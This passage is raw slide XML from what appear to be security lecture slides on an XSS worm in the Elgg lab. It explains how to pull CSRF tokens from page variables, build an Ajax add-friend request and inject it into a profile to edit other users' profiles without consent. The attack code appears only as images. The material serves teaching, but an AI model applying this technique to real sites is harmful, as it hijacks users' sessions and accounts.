              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> URL of Elgg’s add-friend request. UserID of the user to be added to the friend list is used. Here, Samy’s UserID (GUID) is 42.</a:t>
            </a:r>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sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Elgg’s countermeasure against CSRF attacks (this is now enabled).</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="579" name="Google Shape;579;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="440600" y="3459375"/>
            <a:ext cx="5889600" cy="148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rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>③</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Session cookie which is unique for each user. It is automatically sent by browsers. Here, if the attacker wants to access the cookies, it will be allowed as the JavaScript code is from Elgg website and not a third-party page like in CSRF.</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9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XSS Attacks to Befriend with Others</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="585" name="Google Shape;585;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1022554"/>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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The main challenge is in the Line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, to find the values of CSRF countermeasures parameters : _elgg_ts and _elgg_token.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="586" name="Google Shape;586;p97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="385019" y="2095130"/>
            <a:ext cx="5599599" cy="726549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="587" name="Google Shape;587;p97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="385022" y="2821679"/>
            <a:ext cx="5599596" cy="1918997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="588" name="Google Shape;588;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6057943" y="1707503"/>
            <a:ext cx="3024000" cy="32196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Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The secret values are assigned to two JavaScript variables, which make our attack easier as we can load the values from these variables. </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Our JavaScript code is injected inside the page, so it can access the JavaScript variables inside the page.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9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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Construct an Add-friend Request</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="594" name="Google Shape;594;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1275225"/>
            <a:ext cx="5820875" cy="2859150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="595" name="Google Shape;595;p98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6216184" y="1050076"/>
            <a:ext cx="2789100" cy="376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Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Get timestamp and secret token from the JavaScript variables.</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Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>③</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>④</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Construct the URL with the data attached.</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The rest of the code is to create a GET request using Ajax.</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99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203450" y="543262"/>
            <a:ext cx="8520600" cy="5727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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject the Code Into a Profile</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="601" name="Google Shape;601;p99"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="203450" y="1409799"/>
            <a:ext cx="5176550" cy="2961675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="602" name="Google Shape;602;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5308979" y="1115962"/>
            <a:ext cx="3624600" cy="3726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Samy puts the script in the “About Me” section of his profile.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="6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After that, let’s login as “Alice” and visit Samy’s profile.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="6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JavaScript code will be run and not displayed to Alice.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="6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The code sends an add-friend request to the server.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="6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If we check Alice’s friends list, Samy is added.</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10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XSS Attacks to Change Other People’s Profiles</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="608" name="Google Shape;608;p10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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Goal: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Putting a statement “SAMY is MY HERO” in other people’s profile without their consent.</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u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Investigation taken by attacker Samy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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Samy captured an edit-profile request using LiveHTTPHeader. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk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Captured HTTP Request</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="614" name="Google Shape;614;p101"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1142750"/>
            <a:ext cx="6119851" cy="3366925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="615" name="Google Shape;615;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6521225" y="1062450"/>
            <a:ext cx="2479800" cy="399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sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> URL of the edit-profile service.</a:t>
            </a:r>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sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Session cookie (unique for each user). It is automatically set by browsers.</a:t>
            </a:r>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sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>③</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> CSRF countermeasures, which are now enabled.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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Captured HTTP Request (continued)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Screen Clipping" id="621" name="Google Shape;621;p102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1483551" y="1348477"/>
            <a:ext cx="5967817" cy="1199414"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="622" name="Google Shape;622;p102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2687592"/>
            <a:ext cx="8406172" cy="1908215"/>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 sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>④</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Description field with our text “SAMY is MY HERO” (In encoded form)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="215900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>⑤</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
